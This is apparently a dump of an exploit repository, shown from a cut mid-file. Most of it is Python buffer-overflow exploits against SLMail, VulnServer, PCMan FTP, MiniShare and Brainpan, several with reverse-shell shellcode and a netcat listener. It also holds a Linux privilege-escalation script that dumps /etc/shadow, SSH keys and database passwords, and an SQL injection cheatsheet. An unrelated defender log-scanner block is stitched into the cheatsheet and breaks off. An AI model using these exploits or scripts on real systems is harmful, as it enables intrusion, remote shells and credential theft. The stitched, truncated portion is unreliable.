"\xeb\x1b\xb5\x54\xb0\xf8\xd4\xcd\x1c\xae\xe9\x0e" 50 | payload += "\xff\x0f\x4c\x44\xed\x44\xfd\x07\x7b\x9a\x73\x32" 51 | payload += "\xc9\x9c\x8b\x3d\x7d\xf5\xba\xb6\x12\x82\x42\x1d" 52 | payload += "\x57\x7c\x09\x3c\xf1\x15\xd4\xd4\x40\x78\xe7\x02" 53 | payload += "\x86\x85\x64\xa7\x76\x72\x74\xc2\x73\x3e\x32\x3e" 54 | payload += "\x09\x2f\xd7\x40\xbe\x50\xf2\x22\x21\xc3\x9e\x8a" 55 | payload += "\xc4\x63\x04\xd3" 56 | 57 | #----------------------------# 
58 | # Buffer Structure # 59 | #----------------------------# 60 | # buffer = SIZE # 61 | # buffer = " " # 62 | # buffer = AAA...........AAA # 63 | # buffer = EIP # 64 | # buffer = NOPSled # 65 | # buffer = payload # 66 | # buffer = BBB...........BBB # 67 | # buffer = "\r\n" # 68 | #----------------------------# 69 | 70 | buffer = "SIZE" 71 | buffer += " " 72 | buffer += "A" * 246 73 | buffer += struct.pack(' # 15 | #---------------------------------------------------------------------------------------------# 16 | 17 | import sys 18 | import socket 19 | import time 20 | import struct 21 | import subprocess 22 | 23 | 24 | if len(sys.argv) < 2: 25 | print "Usage : python exploit.py " 26 | print "Example : python exploit.py 10.11.0.100" 27 | sys.exit(0) 28 | 29 | HOST = sys.argv[1] 30 | 31 | 32 | #-------------------------------------------------------------------------------------------------------# 33 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.199 LPORT=1337 -b "\x00\x0a" -f python -v payload # 34 | #-------------------------------------------------------------------------------------------------------# 35 | 36 | payload = "" 37 | payload += "\xbd\x06\x1f\xed\xf1\xdd\xc6\xd9\x74\x24\xf4\x5a" 38 | payload += "\x2b\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\xec" 39 | payload += "\xe3\x0f\x04\x0c\xf3\x52\xe7\xec\x04\x33\x61\x09" 40 | payload += "\x35\x73\x15\x5a\x66\x43\x5d\x0e\x8b\x28\x33\xba" 41 | payload += "\x18\x5c\x9c\xcd\xa9\xeb\xfa\xe0\x2a\x47\x3e\x63" 42 | payload += "\xa9\x9a\x13\x43\x90\x54\x66\x82\xd5\x89\x8b\xd6" 43 | payload += "\x8e\xc6\x3e\xc6\xbb\x93\x82\x6d\xf7\x32\x83\x92" 44 | payload += "\x40\x34\xa2\x05\xda\x6f\x64\xa4\x0f\x04\x2d\xbe" 45 | payload += "\x4c\x21\xe7\x35\xa6\xdd\xf6\x9f\xf6\x1e\x54\xde" 46 | payload += "\x36\xed\xa4\x27\xf0\x0e\xd3\x51\x02\xb2\xe4\xa6" 47 | payload += "\x78\x68\x60\x3c\xda\xfb\xd2\x98\xda\x28\x84\x6b" 48 | payload += "\xd0\x85\xc2\x33\xf5\x18\x06\x48\x01\x90\xa9\x9e" 49 | payload += 
"\x83\xe2\x8d\x3a\xcf\xb1\xac\x1b\xb5\x14\xd0\x7b" 50 | payload += "\x16\xc8\x74\xf0\xbb\x1d\x05\x5b\xd4\xd2\x24\x63" 51 | payload += "\x24\x7d\x3e\x10\x16\x22\x94\xbe\x1a\xab\x32\x39" 52 | payload += "\x5c\x86\x83\xd5\xa3\x29\xf4\xfc\x67\x7d\xa4\x96" 53 | payload += "\x4e\xfe\x2f\x66\x6e\x2b\xff\x36\xc0\x84\x40\xe6" 54 | payload += "\xa0\x74\x29\xec\x2e\xaa\x49\x0f\xe5\xc3\xe0\xea" 55 | payload += "\x6e\xe6\xff\xf4\xa9\x9e\xfd\xf4\x30\x66\x8b\x12" 56 | payload += "\x50\x88\xdd\x8d\xcd\x31\x44\x45\x6f\xbd\x52\x20" 57 | payload += "\xaf\x35\x51\xd5\x7e\xbe\x1c\xc5\x17\x4e\x6b\xb7" 58 | payload += "\xbe\x51\x41\xdf\x5d\xc3\x0e\x1f\x2b\xf8\x98\x48" 59 | payload += "\x7c\xce\xd0\x1c\x90\x69\x4b\x02\x69\xef\xb4\x86" 60 | payload += "\xb6\xcc\x3b\x07\x3a\x68\x18\x17\x82\x71\x24\x43" 61 | payload += "\x5a\x24\xf2\x3d\x1c\x9e\xb4\x97\xf6\x4d\x1f\x7f" 62 | payload += "\x8e\xbd\xa0\xf9\x8f\xeb\x56\xe5\x3e\x42\x2f\x1a" 63 | payload += "\x8e\x02\xa7\x63\xf2\xb2\x48\xbe\xb6\xc3\x02\xe2" 64 | payload += "\x9f\x4b\xcb\x77\xa2\x11\xec\xa2\xe1\x2f\x6f\x46" 65 | payload += "\x9a\xcb\x6f\x23\x9f\x90\x37\xd8\xed\x89\xdd\xde" 66 | payload += "\x42\xa9\xf7" 67 | 68 | #----------------------------# 69 | # Buffer Structure # 70 | #----------------------------# 71 | # buffer = AAA...........AAA # 72 | # buffer = EIP # 73 | # buffer = NOPSled # 74 | # buffer = payload # 75 | # buffer = BBB...........BBB # 76 | #----------------------------# 77 | 78 | 79 | buffer = "A" * 2606 80 | buffer += struct.pack('" 97 | subprocess.call(['nc -lnvp 1337'], shell=True) 98 | except: 99 | print "Could not connect to SLMail 5.5.0 Server (._.)" 100 | 101 | 102 | -------------------------------------------------------------------------------- /Exploits/VulnServer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = VulnServer # 4 | # 
Download Link = https://github.com/stephenbradshaw/vulnserver # 5 | # Date = 9/13/2017 # 6 | # Author = @ihack4falafel # 7 | # Tested on = Windows 7 - Professional N SP1 # 8 | # EIP Offset = 1040 # 9 | # Badchars = None # 10 | # RET Address = 0x65d11d71 : "\xFF\xE4" | [VulnServer.exe] # 11 | # Usage = python exploit.py # 12 | #---------------------------------------------------------------------------------------------# 13 | 14 | import sys 15 | import socket 16 | import time 17 | import struct 18 | import subprocess 19 | 20 | #---------------#---------# 21 | W = '\033[0m' # White # 22 | R = '\033[31m' # Red # 23 | G = '\033[32m' # Green # 24 | O = '\033[33m' # Orange # 25 | B = '\033[34m' # Blue # 26 | P = '\033[35m' # Purple # 27 | C = '\033[36m' # Cyan # 28 | M = '\033[35m' # Magenta # 29 | Y = '\033[33m' # Yellow # 30 | #---------------#---------# 31 | 32 | 33 | if len(sys.argv) < 2: 34 | print Y+ "Usage :" + P+ " python exploit.py " +W 35 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 " +W 36 | sys.exit(0) 37 | 38 | HOST = sys.argv[1] 39 | 40 | #-------------------------------------------------------------------------------------------------------# 41 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.199 LPORT=1337 -b "\x00\x0a" -f python -v payload # 42 | #-------------------------------------------------------------------------------------------------------# 43 | 44 | payload = "" # msfvenom shellcode bytes omitted 75 | 76 | #----------------------------# 77 | # Buffer Structure # 78 | #----------------------------# 79 | # buffer = "AUTH " # 80 | # buffer = AAA...........AAA # 81 | # buffer = EIP # 82 | # buffer = NOPSled # 83 | # buffer = payload # 84 | # buffer = BBB...........BBB # 85 | #----------------------------# 86 | 87 | 88 | buffer = "AUTH " 89 | buffer += "A" * 1040 90 | buffer += struct.pack('" +W 105 | 106 | except Exception,msg: 107 | print R+ "[-]" + P+ " Could not connect to VulnServer Server" + Y+ " (._.)" +W 108 | sys.exit(0) 109 |
-------------------------------------------------------------------------------- /Exploits/PCManFTP_2.0.7_USER.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = PCMan FTP Server 2.0.7 - 'USER' # 4 | # Download Link = https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # 5 | # Date = 9/12/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/26471/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 2000 # 10 | # Badchars = "\x00\x0A\x0D" # 11 | # RET Address = 0x7e429353 : "\xFF\xE4" | [USER32.dll] # 12 | # Usage = python exploit.py # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import struct 18 | import time 19 | import subprocess 20 | 21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | 34 | if len(sys.argv) < 2: 35 | print Y+ "Usage :" + P+ " python exploit.py " +W 36 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 0" +W 37 | sys.exit(0) 38 | 39 | HOST = sys.argv[1] 40 | 41 | #---------------------------------------------------------------------------------------------------------------# 42 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.127.128 LPORT=1337 -b "\x00\x0A\x0D" -f python -v payload # 43 | #---------------------------------------------------------------------------------------------------------------# 44 | 45 | payload = "" # msfvenom shellcode bytes omitted 76 | 77 | 78 | #----------------------------# 79 | # Buffer Structure # 80 |
#----------------------------# 81 | # buffer = AAA...........AAA # 82 | # buffer = EIP # 83 | # buffer = NOPSled # 84 | # buffer = payload # 85 | # buffer = BBB...........BBB # 86 | #----------------------------# 87 | 88 | buffer = "A" * 2000 89 | buffer += struct.pack('" +W 104 | subprocess.call(['nc -lnvp 1337'], shell=True) 105 | 106 | except Exception,msg: 107 | 108 | print R+ "[-]" + P+ " Could not connect to PCMan FTP Server" + Y+ " (._.)" +W 109 | sys.exit(0) 110 | 111 | -------------------------------------------------------------------------------- /Exploits/MS_v1.4.1.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | #-----------------------------------------------------------------------------------------------------------# 3 | # Software = MiniShare Version 1.4.1 # 4 | # Download Link = https://www.exploit-db.com/apps/0ffe5385147edd1f9e7b460c6d7cb0a6-minishare-1.4.1.zip # 5 | # Date = 12/18/2017 # 6 | # Reference = http://www.securityfocus.com/bid/11620/discuss # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 1787 # 10 | # Badchars = "\x00\x0d\" # 11 | # RET Address = 0x7e429353 : "\xFF\xE4" | [USER32.dll] # 12 | # Usage = python exploit.py # 13 | #-----------------------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import time 18 | import struct 19 | import subprocess 20 | 21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | if len(sys.argv) < 2: 34 | print Y+ "Usage :" + P+ " python exploit.py " +W 35 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 " +W 36 
| sys.exit(0) 37 | 38 | HOST = sys.argv[1] 39 | 40 | #-----------------------------------------------------------------------------------------------------------# 41 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.199.151 LPORT=1337 -b "\x00\x0d" -f python -v payload # 42 | #-----------------------------------------------------------------------------------------------------------# 43 | 44 | payload = "" # msfvenom shellcode bytes omitted 75 | 76 | #----------------------------# 77 | # Buffer Structure # 78 | #----------------------------# 79 | # buffer = AAA...........AAA # 80 | # buffer = EIP - RET Address # 81 | # buffer = NOPSled # 82 | # buffer = payload # 83 | # buffer = BBB...........BBB # 84 | #----------------------------# 85 | 86 | buffer = "GET " 87 | buffer += "A" * 1787 88 | buffer += struct.pack('" +W 102 | subprocess.call(['nc -lnvp 1337'], shell=True) 103 | except Exception,msg: 104 | print R+ "[-]" + P+ " Could not connect to MiniShare Server" + Y+ " (._.)" +W 105 | sys.exit(0) 106 | 107 | -------------------------------------------------------------------------------- /Exploits/PCManFTP_2.0.7_GET.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = PCMan FTP Server 2.0.7 - 'GET' # 4 | # Download Link = https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # 5 | # Date = 9/19/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/26471/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 2007 # 10 | # Badchars = "\x00\x0A\x0D" # 11 | # RET Address = 0x77fab277 : "\xFF\xE4" | [SHLWAPI.dll] # 12 | # Usage = python exploit.py # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import struct 18 | import time 19 | import subprocess 20 |
21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | 34 | if len(sys.argv) < 2: 35 | print Y+ "Usage :" + P+ " python exploit.py " +W 36 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 0" +W 37 | sys.exit(0) 38 | 39 | HOST = sys.argv[1] 40 | 41 | #---------------------------------------------------------------------------------------------------------------# 42 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.199.129 LPORT=1337 -b "\x00\x0A\x0D" -f python -v payload # 43 | #---------------------------------------------------------------------------------------------------------------# 44 | 45 | payload = "" # msfvenom shellcode bytes omitted 76 | 77 | #----------------------------# 78 | # Buffer Structure # 79 | #----------------------------# 80 | # buffer = AAA...........AAA # 81 | # buffer = EIP # 82 | # buffer = NOPSled # 83 | # buffer = payload # 84 | # buffer = BBB...........BBB # 85 | #----------------------------# 86 | 87 | buffer = "A" * 2007 88 | buffer += struct.pack('" +W 107 | subprocess.call(['nc -lnvp 1337'], shell=True) 108 | 109 | except Exception,msg: 110 | 111 | print R+ "[-]" + P+ " Could not connect to PCMan FTP Server" + Y+ " (._.)" +W 112 | sys.exit(0) 113 | 114 | -------------------------------------------------------------------------------- /Exploits/PCManFTP_2.0.7_PORT.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = PCMan FTP Server 2.0.7 - 'PORT' # 4 | # Download Link = https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # 5 | # Date = 9/19/2017 # 6 | # Reference =
https://www.exploit-db.com/exploits/26471/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 2007 # 10 | # Badchars = "\x00\x0A\x0D" # 11 | # RET Address = 0x7cbd51fb : "\xFF\xE4" | [SHELL32.dll] # 12 | # Usage = python exploit.py # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import struct 18 | import time 19 | import subprocess 20 | 21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | 34 | if len(sys.argv) < 2: 35 | print Y+ "Usage :" + P+ " python exploit.py " +W 36 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 0" +W 37 | sys.exit(0) 38 | 39 | HOST = sys.argv[1] 40 | 41 | #---------------------------------------------------------------------------------------------------------------# 42 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.199.129 LPORT=1337 -b "\x00\x0A\x0D" -f python -v payload # 43 | #---------------------------------------------------------------------------------------------------------------# 44 | 45 | payload = "" # msfvenom shellcode bytes omitted 76 | 77 | #----------------------------# 78 | # Buffer Structure # 79 | #----------------------------# 80 | # buffer = AAA...........AAA # 81 | # buffer = EIP # 82 | # buffer = NOPSled # 83 | # buffer = payload # 84 | # buffer = BBB...........BBB # 85 | #----------------------------# 86 | 87 | buffer = "A" * 2007 88 | buffer += struct.pack('" +W 107 | subprocess.call(['nc -lnvp 1337'], shell=True) 108 | 109 | except Exception,msg: 110 | 111 | print R+ "[-]" + P+ " Could not connect to PCMan FTP Server" + Y+ " (._.)" +W 112 | sys.exit(0) 113 | 114 |
-------------------------------------------------------------------------------- /Exploits/Brainpan_v1.0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = Brainpan.exe version 1.0 # 4 | # Download Link = https://www.vulnhub.com/entry/brainpan-1,51/# # 5 | # Date = 8/31/2017 # 6 | # Author = @ihack4falafel # 7 | # Tested on = Windows XP SP3 - Professional | Ubuntu 12.10 (Quantal Quetzal) # 8 | # EIP Offset = 524 # 9 | # Badchars = "\x00" # 10 | # RET Address = 311712F3 "\xFF\xE4" | [brainpan.exe] # 11 | # Usage = python exploit.py # 12 | #---------------------------------------------------------------------------------------------# 13 | 14 | import sys 15 | import socket 16 | import struct 17 | import time 18 | 19 | if len(sys.argv) < 3: 20 | print "Usage : python exploit.py " 21 | print "Example : python exploit.py 127.0.0.1 0 | Windows XP" 22 | print " python exploit.py 192.168.127.139 1 | Ubuntu 12.10" 23 | sys.exit(0) 24 | 25 | HOST = sys.argv[1] 26 | PLATFORM = sys.argv[2] 27 | 28 | if PLATFORM is "0": 29 | print "[+] Selecting calc.exe payload for Windows XP.." 
30 | time.sleep(1) 31 | 32 | #------------------------------------------------------------------------------# 33 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v payload # 34 | #------------------------------------------------------------------------------# 35 | 36 | payload = "" # msfvenom shellcode bytes omitted 56 | 57 | #----------------------------# 58 | # Buffer Structure # 59 | #----------------------------# 60 | # buffer = AAA...........AAA # 61 | # buffer = EIP # 62 | # buffer = NOPSled # 63 | # buffer = payload # 64 | # buffer = BBB...........BBB # 65 | #----------------------------# 66 | 67 | buffer = "A" * 524 68 | buffer += struct.pack(' " 139 | print "Example : python exploit.py 127.0.0.1 0 | Windows XP" 140 | print " python exploit.py 192.168.127.139 1
| Ubuntu 12.10" 141 | sys.exit(0) 142 | 143 | -------------------------------------------------------------------------------- /BASH/LinuxPrivCheck.sh: -------------------------------------------------------------------------------- 1 | 2 | #---------------------------------------------------------------------------------# 3 | # Name = Linux Quick n' Dirty Privilege Escalation Check Script # 4 | # Reference = https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ # 5 | # Author = @ihack4falafel # 6 | # Date = 12/17/2017 # 7 | # Usage = chmod +x LinuxPrivCheck.sh && ./LinuxPrivCheck.sh # 8 | #---------------------------------------------------------------------------------# 9 | 10 | echo " " 11 | echo -e "\e[35m#----------------------------------#" 12 | echo -e "\e[35m# \e[36m OS Information \e[35m #" 13 | echo -e "\e[35m#----------------------------------#" 14 | echo " " 15 | echo -e "\e[39m" 16 | uname -a # Kernel Version 17 | cat /etc/issue # Distribution 18 | cat /etc/*release # OS Release 19 | echo " " 20 | echo -e "\e[35m#----------------------------------#" 21 | echo -e "\e[35m# \e[36m Network Information \e[35m #" 22 | echo -e "\e[35m#----------------------------------#" 23 | echo " " 24 | echo -e "\e[39m" 25 | cat /etc/resolv.conf # Nameservers 26 | cat /etc/hosts # Hosts 27 | route -n # Route Info. 
28 | iptables -L # Firewall Rules 29 | cat /etc/network/interfaces # Network Interfaces 30 | echo " " 31 | echo -e "\e[35m#----------------------------------#" 32 | echo -e "\e[35m# \e[36m Password Information \e[35m #" 33 | echo -e "\e[35m#----------------------------------#" 34 | echo " " 35 | echo -e "\e[39m" 36 | echo -e "\e[34m" 37 | echo "----------|Password File|-----------" 38 | echo " " 39 | echo -e "\e[39m" 40 | cat /etc/passwd 41 | echo " " # Password File 42 | echo -e "\e[39m" 43 | echo -e "\e[34m" 44 | echo "-----------|Shadow File|------------" 45 | echo " " 46 | echo -e "\e[39m" 47 | cat /etc/shadow # Shadow File 48 | echo " " 49 | echo -e "\e[34m" 50 | echo " " 51 | echo "------------|SSH Keys|--------------" 52 | echo " " 53 | echo -e "\e[39m" 54 | cat /root/.ssh/authorized_keys # Authorized SSH Keys 55 | cat /root/.ssh/known_hosts # SSH Known Hosts 56 | cat ~/.ssh/id_rsa # RSA Keys 57 | cat ~/.ssh/id_dsa # DSA Keys 58 | cat /etc/ssh/ssh_host_dsa_key # Alernative DSA keys 59 | cat /etc/ssh/ssh_host_rsa_key # Alternative RSA Keys 60 | echo " " 61 | echo -e "\e[35m#----------------------------------#" 62 | echo -e "\e[35m# \e[36m Misc. 
Information \e[35m #" 63 | echo -e "\e[35m#----------------------------------#" 64 | echo " " 65 | echo -e "\e[39m" 66 | echo -e "\e[34m" 67 | echo "------|Important Executables|-------" 68 | echo -e "\e[39m" 69 | echo " " 70 | which wget # Check Wget 71 | which nc # Check Nc 72 | which netcat # Check Netcat 73 | which python # Check Python 74 | which python3 # Check Python3 75 | which gcc # Check GCC 76 | which perl # Check Perl 77 | echo -e "\e[34m" 78 | echo " " 79 | echo "-----------|Sudoers File|-----------" 80 | echo " " 81 | echo -e "\e[39m" 82 | cat /etc/sudoers # Check Sudoers 83 | echo -e "\e[34m" 84 | echo " " 85 | echo "--------------|Users|---------------" 86 | echo " " 87 | echo -e "\e[39m" 88 | cat /etc/passwd | cut -d: -f1 # List Users 89 | echo -e "\e[34m" 90 | echo " " 91 | echo "-------------|Groups|---------------" 92 | echo " " 93 | echo -e "\e[39m" 94 | cat /etc/group # Check Groups 95 | echo -e "\e[34m" 96 | echo " " 97 | echo "-----------|SUID Files|-------------" 98 | echo " " 99 | echo -e "\e[39m" 100 | find / -type f -perm -u=s -exec ls -la {} + 2>/dev/null # Check SUID Files 101 | echo -e "\e[34m" 102 | echo " " 103 | echo "-----------|GUID Files|-------------" 104 | echo " " 105 | echo -e "\e[39m" 106 | find / -type f -perm -g=s -exec ls -la {} + 2>/dev/null # Check GUID Files 107 | echo -e "\e[34m" 108 | echo " " 109 | echo "-----------|NO ROOT SQUASH|---------" 110 | echo " " 111 | echo -e "\e[39m" # check no_root_squash 112 | if [ $(cat /etc/exports 2>/dev/null | grep no_root_squash | wc -c) -ne 0 ] 113 | then 114 | echo "NO_ROOT_SQUASH FOUND! " && cat /etc/exports | grep no_root_squash 115 | else 116 | echo "NO_ROOT_SQUASH NOT FOUND!" 117 | fi 118 | echo -e "\e[34m" 119 | echo " " 120 | echo "----------------|EXIM|--------------" 121 | echo " " 122 | echo -e "\e[39m" # Check exim 123 | if [ $(which exim | wc -c) -ne 0 ] 124 | then 125 | echo -n "EXIM FOUND! " && exim -bV | grep version 126 | else 127 | echo "EXIM NOT FOUND!" 
128 | fi 129 | echo -e "\e[34m" 130 | echo " " 131 | echo "-------------|CHKROOTKIT|-----------" 132 | echo " " 133 | echo -e "\e[39m" # Check chkrootkit 134 | if [ $(which chkrootkit | wc -c) -ne 0 ] 135 | then 136 | echo -n "CHKROOTKIT FOUND! " && chkrootkit -V 137 | else 138 | echo "CHKROOTKIT NOT FOUND!" 139 | fi 140 | echo -e "\e[34m" 141 | echo " " 142 | echo "-------------|MySQL Creds|-----------" 143 | echo " " 144 | echo -e "\e[39m" # Check MySQL Creds 145 | if [ $(find / -iname wp-config.php 2>/dev/null | wc -c) -ne 0 ] 146 | then 147 | echo "WP-CONFIG.PHP FOUND! " && cat $(locate wp-config.php) | grep DB_NAME && cat $(locate wp-config.php) | grep DB_USER && cat $(locate wp-config.php) | grep DB_PASSWORD 148 | else 149 | echo "WP-CONFIG.PHP NOT FOUND!" 150 | fi 151 | echo -e "\e[34m" 152 | echo " " 153 | echo "--------------|FSTab|---------------" 154 | echo " " 155 | echo -e "\e[39m" 156 | cat /etc/fstab # Check Fstab 157 | echo -e "\e[34m" 158 | echo " " 159 | echo "---------|Daily Cron Jobs|----------" 160 | echo " " 161 | echo -e "\e[39m" 162 | ls -la /etc/cron.d/ # Check Cron Jobs 163 | ls -la /etc/cron.daily/ # Alternative Check Cron Jobs 164 | echo -e "\e[34m" 165 | echo " " 166 | echo "-------------|Crontab|--------------" 167 | echo " " 168 | echo -e "\e[39m" 169 | cat /etc/crontab # Check Crontab 170 | echo -e "\e[34m" 171 | echo " " 172 | echo "------|World Writable Folders|------" 173 | echo " " 174 | echo -e "\e[39m" 175 | find / -perm -222 -type d 2>/dev/null # World Wireable Folders 176 | echo -e "\e[34m" 177 | echo " " 178 | echo "-----------|Home Directory|---------" 179 | echo " " 180 | echo -e "\e[39m" 181 | ls -ahl /home/ 2>/dev/null # Check Home Directory 182 | echo " " 183 | touch ~/.bash_history # Clear Command History 184 | echo " " 185 | echo -e "\e[35m#----------------------------------#" 186 | echo -e "\e[35m# \e[36m Script has been completed! 
\e[35m #" 187 | echo -e "\e[35m#----------------------------------#" 188 | echo " " 189 | echo -e "\e[39m" 190 | 191 | -------------------------------------------------------------------------------- /Documents/SQL Injection Cheatsheet.md: -------------------------------------------------------------------------------- 1 | #### SQL Injection Cheatsheet 2 | This cheatsheet should NOT be considered a reference but a guide to build on; some of the examples below will require modification(s) such as URL encoding, comments, etc. Before we continue, here are a couple of good-to-know SQL functions 3 | 4 | ```php 5 | limit , # display rows based on offset and number 6 | 7 | count(*) # display number of rows 8 | 9 | rand() # generate random number between 0 and 1 10 | 11 | floor(rand()*) # print out the integer part of a random decimal number 12 | 13 | select(select database()); # double query (nested) using database() as an example 14 | 15 | group by # summarize rows based on column name 16 | 17 | concat(, , ..) # concatenate strings such as table or column names 18 | 19 | length() # calculate the number of characters in the given string 20 | 21 | substr(,,) # print string character(s) by providing offset and length 22 | 23 | ascii() # decimal representation of the character 24 | 25 | sleep() # go to sleep for 26 | 27 | if(,,) # conditional if statement 28 | 29 | like "%" # checks if the provided string is present 30 | 31 | outfile "" # dump output of select statement into a file 32 | 33 | load_file("") # dump the content of a file 34 | ``` 35 | Now comes the fun part: here is a combination of error-based, union-based and blind SQL command injection examples.
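Before the examples, a defender-side companion to this cheatsheet, added here and not part of the repository: a scanner that flags the probes listed in it (ORDER BY column counting, UNION SELECT, @@version, information_schema, INTO OUTFILE, load_file(), sleep()) in web-server access-log lines. The Common Log Format layout, the rule names, the client IPs and the sample log lines are all constructed assumptions.

```python
# Added example, not part of the cheatsheet or the OSCP repository: a
# defender-side scanner that flags the MySQL injection probes listed above
# (ORDER BY column counting, UNION SELECT, @@version, information_schema,
# INTO OUTFILE, load_file(), sleep()) in web-server access-log lines.
# Log format (Common Log Format), rule names and the sample lines are
# assumptions constructed for this example.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One line of the CLF-style access log: client IP, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# The digit is required so a legitimate "order by date" parameter is not flagged.
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)")

# Rules mirror the cheatsheet's probes; they run against decoded, lower-cased values.
RULES = [
    ("order_by_probe", ORDER_BY),
    ("union_select",   re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("version_probe",  re.compile(r"@@version|\bversion\s*\(")),
    ("schema_enum",    re.compile(r"\binformation_schema\.")),
    ("file_write",     re.compile(r"\binto\s+(?:out|dump)file\b")),
    ("file_read",      re.compile(r"\bload_file\s*\(")),
    ("time_based",     re.compile(r"\bsleep\s*\(\s*\d+")),
    ("comment_tail",   re.compile(r"--\+|--\s|/\*")),
]


def decoded_params(path):
    """Return (name, value) pairs for each query parameter in a request target.

    parse_qsl already percent-decodes once; the extra unquote_plus pass
    also catches double-encoded probes such as id=-1%2520union%2520select.
    """
    query = urlsplit(path).query
    return [(k, unquote_plus(v).lower())
            for k, v in parse_qsl(query, keep_blank_values=True)]


def scan_line(line):
    """Parse one log line; return a record with the rule names it triggered,
    or None when the line does not match the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    for _, value in decoded_params(m.group("path")):
        for name, rx in RULES:
            if name not in hits and rx.search(value):
                hits.append(name)
    return {"ip": m.group("ip"), "path": m.group("path"),
            "status": m.group("status"), "hits": hits}


def scan_log(lines):
    """Return only the records that triggered at least one rule."""
    findings = []
    for line in lines:
        rec = scan_line(line)
        if rec and rec["hits"]:
            findings.append(rec)
    return findings


def order_by_sweeps(lines, threshold=3):
    """Map client IP -> sorted column numbers tried, for clients that tried
    at least `threshold` distinct values: the signature of the
    `wfuzz -z range,1-10 ... order by FUZZ` column-counting sweep."""
    tried = {}
    for line in lines:
        rec = scan_line(line)
        if not rec:
            continue
        for _, value in decoded_params(rec["path"]):
            for n in ORDER_BY.findall(value):
                tried.setdefault(rec["ip"], set()).add(int(n))
    return {ip: sorted(ns) for ip, ns in tried.items() if len(ns) >= threshold}


# Constructed sample log: one client counting columns, then dumping the
# version and table names (the last request double-encoded); a second
# client making benign requests, including a real "order by date" parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2017:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [12/Sep/2017:10:00:02 +0000] "GET /index.php?id=1%20order%20by%201 HTTP/1.1" 200 5120
10.0.0.5 - - [12/Sep/2017:10:00:02 +0000] "GET /index.php?id=1%20order%20by%202 HTTP/1.1" 200 5120
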